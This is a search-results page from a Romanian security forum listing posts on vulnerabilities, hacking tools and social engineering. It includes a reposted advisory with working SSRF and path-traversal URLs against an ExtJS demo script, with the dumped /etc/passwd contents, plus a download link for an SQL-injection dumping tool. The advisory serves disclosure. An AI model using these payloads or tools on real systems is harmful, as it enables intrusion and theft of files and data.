Jump to content

Search the Community

Showing results for tags 'read'.


More search options

  • Search By Tags

    Type tags separated by commas.

  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Fake News Romania
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.

Find results in...

Find results that contain...


Date Created

  • Start

    End

Last Updated

  • Start

    End

Filter by number of...

Joined

  • Start

    End

Group

Website URL

Yahoo

Jabber

Skype

Location

Interests

Biography

Location

Interests

Occupation

Found 6 results

  1. KhiZaRix
    Hi all?? Baidu Security Team found a vulnerability in extjs,with this vulnerability we can read arbitrary file and request internal http services File: /examples/feed-viewer/feed-proxy.php line:3-line:6 $feed = $_REQUEST['feed']; if($feed != '' && strpos($feed, 'http') === 0){ header('Content-Type: text/xml'); $xml = file_get_contents($feed); When we request like this url http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http://10.1.1.1 if the resource exist,we can get internal http services info ??strpos($feed, 'http') === 0?? we can request this url to bypass the restrictions achieve arbitrary file read http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../etc/passwd view the HTML source code root:x:0:0:Web-useast4 root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:Web-useast4 www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false landscape:x:103:108::/var/lib/landscape:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash ntp:x:105:111::/home/ntp:/bin/false snmp:x:106:112::/var/lib/snmp:/bin/false statd:x:107:65534::/var/lib/nfs:/bin/false postfix:x:108:114::/var/spool/postfix:/bin/false Submitter: zhanghao@Baidu X-team gaojianfeng@Baidu X-team shitong@Baidu X-team ________________________________ Id:Yaseng Hi: Hisengberg Team: Baidu X-team E-mail:gaojianfeng@baidu.com<mailto:gedongyu@baidu.com> [tips] Source: http://dl.packetstormsecurity.net/1505-exploits/extjs-disclose.txt
  2. Molo.Interlopul
    SQLi Dumper v.7 - Tool to find bugs errors or vulnerabilities in MySQL database Functions SQL Injection Operation System Function Dump Database Extract Database Schema Search Columns Name Read File (read only) Create File (read only) Brute Table & Column http://www.4shared.com/rar/7grTslfQce/SQLi_Dumper_v71.html
  3. Aerosol
    Summary: 1. Thanks for the sample file(s) 2. First view 3. Second view 4. More Read more: http://dl.packetstormsecurity.net/papers/virus/fakeav-downloader-analysis.pdf
  4. Aerosol
    Proof of Concept 1: http://www.mediafire.com/dynamic/ct.php?link=norm_header_up_btn&url=%2F%25%77%77%77% 2E%79%61%68%6F%6F%2E%63%6F%6D%20%20 Read more: http://dl.packetstormsecurity.net/1502-exploits/Mediafire.pdf
  5. Aerosol
    This is a brief write up noting javascript backdoors left in common PHP shells. Read more: http://dl.packetstormsecurity.net/papers/general/backdoor.pdf
  6. m0rphic
    " Decipher the unspoken vocabulary of body language. A tilt of the head, the crossing of legs, the buttoning and unbuttoning of a jacket, and other gestures can speak volumes about what a person is thinking or feeling. By learning to spot hidden emotional, social, and sexual messages, you can tell how a person is reacting to you, respond appropriately, andinfluence the outcome of any situation. Detect and send messages of friendliness and flirtation. Gain and maintain the upper hand in negotiations and arguments. Determine whether someone is lying, recognize boredom, and overcome defensiveness. By interpreting nonverbal behavior, you can improve your control over job interviews, business meetings, parties, chance encounters, and other everyday situations. " Am citit o buna parte din ea,si pot zice ca e bine structurata si contine informatii destul de utile pentru viata de zi cu zi dar si pentru un bun 'social engineer' download: how_to_read_a_person_like_a_book.pdf
×
×
  • Create New...